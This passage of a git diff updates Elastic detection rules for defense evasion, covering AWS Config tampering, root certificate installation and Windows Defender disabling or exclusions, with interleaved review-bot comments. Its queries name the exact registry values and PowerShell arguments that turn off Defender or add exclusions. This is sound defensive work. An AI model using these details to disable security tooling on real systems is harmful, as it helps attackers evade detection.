This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"conhost.exe\" and\n not process.executable : (\"?:\\\\Windows\\\\splwow64.exe\", \"?:\\\\Windows\\\\System32\\\\WerFault.exe\", \"?:\\\\Windows\\\\System32\\\\conhost.exe\")\n", "references": [ "https://modexp.wordpress.com/2018/09/12/process-injection-user-data/", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Defense%20Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "28896382-7d4f-4d50-9b72-67091901fd26", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -47,5 +65,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_config_service_rule_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_config_service_rule_deletion.json index f58164d1a483f..96e5106738636 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_config_service_rule_deletion.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_config_service_rule_deletion.json
@@ -15,16 +15,41 @@ "interval": "10m", "language": "kuery", "license": "Elastic License v2", - "name": "AWS Config Service Tampering", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "name": "AWS Config Resource Deletion", + "note": "## Triage and analysis\n\n### Investigating AWS Config Resource Deletion\n\nAWS Config provides a detailed view of the configuration of AWS resources in your AWS account. This includes how the\nresources are related to one another and how they were configured in the past so that you can see how the configurations\nand relationships change over time.\n\nThis rule looks for the deletion of AWS Config resources using various API actions. Attackers can do this to cover their\ntracks and impact security monitoring that relies on these sources.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Identify the AWS resource that was involved and its criticality, ownership, and role in the environment. 
Also investigate\nif the resource is security-related.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the 
attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:config.amazonaws.com and\n event.action:(DeleteConfigRule or DeleteOrganizationConfigRule or DeleteConfigurationAggregator or\n DeleteConfigurationRecorder or DeleteConformancePack or DeleteOrganizationConformancePack or\n DeleteDeliveryChannel or DeleteRemediationConfiguration or DeleteRetentionConfiguration)\n", "references": [ "https://docs.aws.amazon.com/config/latest/developerguide/how-does-config-work.html", "https://docs.aws.amazon.com/config/latest/APIReference/API_Operations.html" ], - "risk_score": 47, + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" 
+ }
+ ],
+ "risk_score": 21,
 "rule_id": "7024e2a0-315d-4334-bb1a-552d604f27bc",
- "severity": "medium",
+ "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "severity": "low",
 "tags": [
 "Elastic",
 "Cloud",
@@ -59,5 +84,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_configuration_recorder_stopped.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_configuration_recorder_stopped.json
index c222b25721292..f4463a966f553 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_configuration_recorder_stopped.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_configuration_recorder_stopped.json
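Review bot: The query kept in this hunk has no `event.outcome:success` clause, so a denied or failed Delete* call alerts the same way a successful one does, whereas the sibling AWS rules touched in this commit (StopLogging, DeleteAlarms, StopConfigurationRecorder) all require success; the new note describes the rule as looking for "the deletion of AWS Config resources" without saying that attempts count, and `required_fields` accordingly omits event.outcome. Alerting on attempts is defensible for a rule now rated low, since a denied tampering call is itself a useful signal, but the behaviour should be stated so analysts do not assume the resource is gone: add to the note `Note that this rule also alerts on unsuccessful calls; check `event.outcome` to confirm whether the deletion actually took effect.` If success-only is intended instead, append `and event.outcome:success` to the query and add an `event.outcome` entry to `required_fields`. The rename plus the risk_score and severity downgrade in the same hunk is not explained by anything visible here; a line in the commit message would help reviewers of the rule history.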
@@ -15,14 +15,44 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "AWS Configuration Recorder Stopped",
- "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:aws.cloudtrail and event.provider:config.amazonaws.com and event.action:StopConfigurationRecorder and event.outcome:success\n",
 "references": [
 "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/configservice/stop-configuration-recorder.html",
 "https://docs.aws.amazon.com/config/latest/APIReference/API_StopConfigurationRecorder.html"
 ],
+ "related_integrations": [
+ {
+ "integration": "cloudtrail",
+ "package": "aws",
+ "version": "1.10.2"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "fbd44836-0d69-4004-a0b4-03c20370c435",
+ "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -58,5 +88,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_create_mod_root_certificate.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_create_mod_root_certificate.json
index 89cadc166debf..124629ec51b20 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_create_mod_root_certificate.json
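Review bot: `"note": ""` leaves this high-severity rule with no investigation guide at all: the old `## Config` text was moved into the new `setup` field, but nothing replaced it, while every sibling AWS rule in this commit (StopLogging, DeleteAlarms, Config resource deletion) gained a full "Investigating …" note. An empty string is also worse than omitting the key, because the UI will render a blank guide rather than nothing. Either drop the `note` key or add a guide in the same shape as the DeleteAlarms one — a short paragraph on what stopping the configuration recorder (the `StopConfigurationRecorder` action in the query) does to configuration-change visibility, the shared investigation steps on the calling identity, source IP and change-management approval, the user-plus-IP exception guidance, and the shared AWS response and remediation list — so analysts handling a risk_score 73 alert are not left without context.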
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_create_mod_root_certificate.json
@@ -2,7 +2,7 @@
 "author": [
 "Elastic"
 ],
- "description": "Identifies the creation or modification of a local trusted root certificate in Windows. The install of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid signed components from any entity (e.g. Microsoft). It could also allow an attacker to decrypt SSL traffic.",
+ "description": "Identifies the creation or modification of a local trusted root certificate in Windows. The install of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid signed components from any entity (for example, Microsoft). It could also allow an attacker to decrypt SSL traffic.",
 "false_positives": [
 "Certain applications may install root certificates for the purpose of inspecting SSL traffic."
 ],
@@ -15,14 +15,27 @@ "language": "eql", "license": "Elastic License v2", "name": "Creation or Modification of Root Certificate", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Creation or Modification of Root Certificate\n\nRoot certificates are the primary level of certifications that tell a browser that the communication is trusted and\nlegitimate. This verification is based upon the identification of a certification authority. Windows\nadds several trusted root certificates so browsers can use them to communicate with websites.\n\n[Check out this post](https://www.thewindowsclub.com/what-are-root-certificates-windows) for more details on root certificates and the involved cryptography.\n\nThis rule identifies the creation or modification of a root certificate by monitoring registry modifications. The\ninstallation of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid\nsigned components from any entity (for example, Microsoft). It could also allow an attacker to decrypt SSL traffic.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process such as network connections, other registry or file\nmodifications, and any spawned child processes.\n- If one of the processes is suspicious, retrieve it and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting\nSSL traffic. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "registry where event.type in (\"creation\", \"change\") and\n registry.path :\n (\n \"HKLM\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\"\n )\n", "references": [ "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", "https://www.ired.team/offensive-security/persistence/t1130-install-root-certificate" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -57,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } 
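Review bot: The new note's investigation steps are entirely process-centric and never tell the analyst to look at the certificate itself, which is the one artifact that decides whether this is the SSL-inspection false positive the note anticipates or a hostile root. The query matches on `…\Certificates\*\Blob`, and in the Windows certificate store that wildcard segment is, as far as I know, the certificate's thumbprint, so the alert already carries the identifier needed to pivot. Suggest adding a step after the process-tree item: `- Inspect the certificate written to the registry path in the alert (the key name under `Certificates\` is the certificate thumbprint): check its subject, issuer and validity period, and verify whether it belongs to a known SSL-inspection or endpoint-security product deployed in your environment before treating the alert as benign.` The remediation item `Remove the malicious certificate from the root certificate store.` would then have a concrete object to refer back to.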
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cve_2020_0601.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cve_2020_0601.json
index fba792e80d490..0d6241fff2814 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cve_2020_0601.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cve_2020_0601.json
@@ -11,6 +11,18 @@
 "license": "Elastic License v2",
 "name": "Windows CryptoAPI Spoofing Vulnerability (CVE-2020-0601 - CurveBall)",
 "query": "event.provider:\"Microsoft-Windows-Audit-CVE\" and message:\"[CVE-2020-0601]\"\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "message",
+ "type": "match_only_text"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "56557cde-d923-4b88-adee-c61b3f3b5dc3",
 "severity": "low",
@@ -47,5 +59,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_defender_disabled_via_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_defender_disabled_via_registry.json
index 7674d0a4db706..f8b76e6437de9 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_defender_disabled_via_registry.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_defender_disabled_via_registry.json
@@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Windows Defender Disabled via Registry Modification", - "note": "## Triage and analysis\n\n### Investigating Windows Defender Disabled via Registry Modification\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple\nenvironments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the registry for configurations that disable Windows Defender or the start of its service.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if this operation is done under change management and approved according to the organization's policy.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the administrator is aware of the activity,\nthe configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting),\nand no other suspicious activity has been observed.\n\n### Related rules\n\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Re-enable Windows Defender and restore the service configurations to automatic start.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Windows Defender Disabled via Registry Modification\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple\nenvironments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the registry for configurations that disable Windows Defender or the start of its service.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if this operation was approved and performed according to the organization's change management policy.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity,\nthe configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting),\nand no other suspicious activity has been observed.\n\n### Related rules\n\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Re-enable Windows Defender and restore the service configurations to automatic start.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "registry where event.type in (\"creation\", \"change\") and\n (\n (\n registry.path:\"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\" and\n registry.data.strings: (\"1\", \"0x00000001\")\n ) or\n (\n registry.path:\"HKLM\\\\System\\\\*ControlSet*\\\\Services\\\\WinDefend\\\\Start\" and\n registry.data.strings in (\"3\", \"4\", \"0x00000003\", \"0x00000004\")\n )\n )\n", "references": [ "https://thedfirreport.com/2020/12/13/defender-control/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "2ffa1f1e-b6db-47fa-994b-1512743847eb", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -58,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_defender_exclusion_via_powershell.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_defender_exclusion_via_powershell.json index 3ea80655c3559..f8dfedb11c29b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_defender_exclusion_via_powershell.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_defender_exclusion_via_powershell.json 
@@ -12,13 +12,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Windows Defender Exclusions Added via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Windows Defender Exclusions Added via PowerShell\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows. Since this software product is\nused to prevent and stop malware, it's important to monitor what specific exclusions are made to the product's configuration\nsettings. These can often be signs of an adversary or malware trying to bypass Windows Defender's capabilities. One of\nthe more notable [examples](https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/)\nwas observed in 2018 where Trickbot incorporated mechanisms to disable Windows Defender to avoid detection. \n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Examine the exclusion in order to determine the intent behind it.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- If the exclusion specifies a suspicious file or path, retrieve the file(s) and determine if malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' 
SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives due to how often network administrators legitimately configure\nexclusions. In order to validate the activity further, review the specific exclusion and its intent. There are many\nlegitimate reasons for exclusions, so it's important to gain context.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Exclusion lists for antimalware capabilities should always be routinely monitored for review.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Windows Defender Exclusions Added via PowerShell\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows. Since this software product is\nused to prevent and stop malware, it's important to monitor what specific exclusions are made to the product's configuration\nsettings. These can often be signs of an adversary or malware trying to bypass Windows Defender's capabilities. One of\nthe more notable [examples](https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/)\nwas observed in 2018 where Trickbot incorporated mechanisms to disable Windows Defender to avoid detection.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Examine the exclusion in order to determine the intent behind it.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- If the exclusion specifies a suspicious file or path, retrieve the file(s) and determine if malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives due to how often network administrators legitimately configure\nexclusions. In order to validate the activity further, review the specific exclusion and its intent. 
There are many\nlegitimate reasons for exclusions, so it's important to gain context.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Exclusion lists for antimalware capabilities should always be routinely monitored for review.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or process.pe.original_file_name in (\"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\")) and\n process.args : (\"*Add-MpPreference*\", \"*Set-MpPreference*\") and\n process.args : (\"*-Exclusion*\")\n", "references": [ "https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "2c17e5d7-08b9-43b2-b58a-0270d65ac85b", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -80,5 +103,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 8 + "version": 10 } 
